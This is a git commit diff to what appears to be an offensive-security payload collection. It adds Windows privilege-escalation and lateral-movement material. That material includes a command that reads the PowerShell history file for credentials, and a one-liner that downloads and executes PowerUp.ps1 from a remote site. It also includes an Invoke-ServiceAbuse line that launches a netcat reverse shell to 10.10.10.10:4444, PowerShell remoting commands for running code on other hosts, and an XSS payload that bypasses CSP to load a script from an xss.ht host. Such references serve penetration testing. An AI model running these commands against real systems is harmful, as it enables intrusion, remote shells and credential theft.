Powershell Remoting

patch-1
Swissky 2020-08-09 12:15:56 +02:00
parent 268b4c2d47
commit c7e3ea005e
4 changed files with 54 additions and 3 deletions

View File

@ -457,6 +457,7 @@ Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
### Powershell history ### Powershell history
```powershell ```powershell
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath cat (Get-PSReadlineOption).HistorySavePath
@ -676,7 +677,24 @@ wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
``` ```
Metasploit provides the exploit : `exploit/windows/local/trusted_service_path` * Metasploit exploit : `exploit/windows/local/trusted_service_path`
* PowerUp exploit
```powershell
# find the vulnerable application
C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks"
...
[*] Checking for unquoted service paths...
ServiceName : BBSvc
Path : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'BBSvc' -Path <HijackPath>
...
# automatic exploit
Invoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exe"
```
### Example ### Example

View File

@ -11,6 +11,7 @@
* [Metasploit - Psexec](#metasploit-psexec) * [Metasploit - Psexec](#metasploit-psexec)
* [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials) * [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials)
* [WinRM](#winrm) * [WinRM](#winrm)
* [Powershell Remoting](#powershell-remoting)
* [Crackmapexec](#crackmapexec) * [Crackmapexec](#crackmapexec)
* [Winexe](#winexe) * [Winexe](#winexe)
* [WMI](#wmi) * [WMI](#wmi)
@ -147,6 +148,30 @@ conn.shell(:powershell) do |shell|
end end
``` ```
## Powershell Remoting
> PSSESSION
```powershell
PS> Enable-PSRemoting
# one-to-one interactive session
PS> Enter-PSSession -computerName DC01
[DC01]: PS>
# one-to-one execute scripts and commands
PS> $Session = New-PSSession -ComputerName CLIENT1
PS> Invoke-Command -Session $Session -scriptBlock { $test = 1 }
PS> Invoke-Command -Session $Session -scriptBlock { $test }
1
# one-to-many execute scripts and commands
PS> Invoke-Command -computername DC01,CLIENT1 -scriptBlock { Get-Service }
PS> Invoke-Command -computername DC01,CLIENT1 -filePath c:\Scripts\Task.ps1
```
## Winexe ## Winexe
Integrated to Kali Integrated to Kali
@ -262,6 +287,7 @@ PS C:\> runas /netonly /user:DOMAIN\username "cmd.exe"
PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe
``` ```
## References ## References
- [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/) - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)

View File

@ -4,7 +4,13 @@ A list of useful payloads and bypasses for Web Application Security.
Feel free to improve with your payloads and techniques ! Feel free to improve with your payloads and techniques !
I :heart: pull requests :) I :heart: pull requests :)
You can also contribute with a :beers: IRL You can also contribute with a :beers: IRL, or using the sponsor button.
<p align="center">
<img src="https://repository-images.githubusercontent.com/71220757/fac34f00-9854-11ea-9d6f-55fe78f233fb">
</p>
Every section contains the following files, you can use the `_template_vuln` folder to create a new chapter: Every section contains the following files, you can use the `_template_vuln` folder to create a new chapter:

View File

@ -972,7 +972,8 @@ window.frames[0].document.head.appendChild(script);
### Bypass CSP by [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f) ### Bypass CSP by [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f)
```js ```js
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://yoursubdomain.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000) // CSP Bypass with Inline and Eval
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
``` ```
### Bypass CSP by [@akita_zen](https://twitter.com/akita_zen) ### Bypass CSP by [@akita_zen](https://twitter.com/akita_zen)